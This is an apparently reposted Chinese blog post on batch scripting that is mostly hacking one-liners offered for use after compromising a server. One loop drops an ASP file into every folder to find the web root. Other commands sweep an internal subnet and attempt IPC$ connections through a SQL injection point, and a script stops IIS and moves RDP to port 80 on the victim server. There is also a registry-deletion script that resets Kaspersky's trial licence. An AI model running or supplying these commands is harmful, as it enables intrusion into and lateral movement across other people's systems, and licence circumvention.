首页 电脑 电脑学堂 查看内容

批处理学习

2009-5-9 11:13 687 0

摘要: for %%i in (C:,d:,e:,F:,G:) do for /r %%j in (rr.asp) do %%i && echo ^<%response.write(se...
关键词: 卡巴 echo reg Databackup admin toyaya CurrentControlSe hklm 命令 txt

for %%i in (C:,d:,e:,F:,G:) do for /r %%j in (rr.asp) do %%i && echo ^<%response.write(server.mappath(""))%^>>%%j 怎么说呢,上面这行命令一般用于在有cmd的shell权限后,又没有找到网站目录的情况下使用,效果很好。 给c,d,e,f,g每个盘下的每个文件夹下建一个r.asp内容是一句话小马   for %i in (C:,d:,e:,F:,G:) do for /r %j in (r.asp) do %i && del /f /q %j   这个命令就是删除c,d,e,f,g盘下的r.asp文件   @echo off for /l %%i in (1,1,254) do ping -l 0 -n 2 192.168.1.%%i | find "Reply" && echo %%i>>c:\ping.txt && net use \\192.168.1.%%i\ipc$ && echo %%i>>c:\ipc.txt @exit   上面这个,我一般用于注入的时候,数据库和web分离(数据库在内网),数据库只能用注入点连接执行命令,那么,我们可以试试利用注入点渗透数据库内网。   @echo off @title 卡巴试用激活 by 290851488 @echo /********************************************/ @echo /* 卡巴试用激活 */ @echo /* */ @echo /* 运行前保证以下条件: */ @echo /* 1.以管理员权限或可操作注册表权限运行. */ @echo /* 2.卡巴斯基没有运行. */ @echo /********************************************/ @pause reg delete hklm\SOFTWARE\KasperskyLab\LicStorage /f reg delete hklm\SOFTWARE\Microsoft\Cryptography\RNG /f reg delete hklm\SOFTWARE\Microsoft\SystemCertificates\SPC\Certificates /f @echo /********************************************/ @echo /* 操作完成,请打开卡巴斯基进行试用! */ @echo /********************************************/ @pause   以前看到关于卡巴注册表的东西,那个时候自己也用卡巴,于是写了这么一个东西。   net stop "HTTP SSL">G:\toyaya\admin\Databackup\e.txt net stop "IIS Admin Service">>G:\toyaya\admin\Databackup\e.txt net stop "World Wide Web Publishing Service">>G:\toyaya\admin\Databackup\e.txt reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /f /t REG_DWORD /d 80>>G:\toyaya\admin\Databackup\e.txt reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /f /t REG_DWORD /d 80>>G:\toyaya\admin\Databackup\e.txt at 00:30 reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /f /t REG_DWORD /d 3389^>G:\toyaya\admin\Databackup\a.txt at 00:30 reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /f /t REG_DWORD /d 3389^>^>G:\toyaya\admin\Databackup\a.txt at 00:30 net start "IIS Admin Service">^>^G:\toyaya\admin\Databackup\a.txt at 00:30 net start "World Wide Web Publishing Service"^>^>G:\toyaya\admin\Databackup\a.txt at 00:30 net start "HTTP SSL"^>^>G:\toyaya\admin\Databackup\a.txt 这段命令呢。意思为停止iis服务,修改终端登录端口为80..。 意思呢,很明显就是用于web和db不分离,但服务器不能访问外网 没办法只能用这个来登录服务器。(其实很多强人已写出来端口复用工具) 说明一下,at命令呢,是我为了防备,如果在操作前面的过程中,有问题比如3389端口没有修改成功,那么到了00:30这个时间的时候,系统会自己再把iis服务启动,我们就可以在注入点里执行命令了,主要还是为了防止万一,如果可以用80登录远程桌面,我们可以用 at命令删除任务。   @echo off @reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion" /v ProgramFilesDir /t REG_SZ /f /d f: @echo "软件默认安装路径已修改" @pause @reg add "HKCU\Environment" /v USERPROFILE /t reg_sz /f /d "d:\Documents and Settings\Administrator" @echo "用户默认文件夹已修改" @pause @reg add "hklm\SOFTWARE\Microsoft\Command Processor" /v autorun /t reg_sz /f /d "d:\工作\command.cmd" @echo "CMD已加密" @pause @reg add "hklm\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v PagingFiles /t reg_sz /f /d "d:\pagefile.sys" @echo "页面文件已修改" @pause @reg add "hkcr\lnkfile" /v IsShortcut /f /d "-" @reg add "hkcr\lnkfile" /v piffile /f /d "-" @reg add "hkcr\lnkfile" /v NeverShowExt /f /d "-" @reg add "hku\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer" /v Link /t REG_BINARY /f /d 00000000 @echo "快捷方式修改成功" @pause 这段呢,是我重装系统后用来设置系统的,希望对大家学习有用!
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部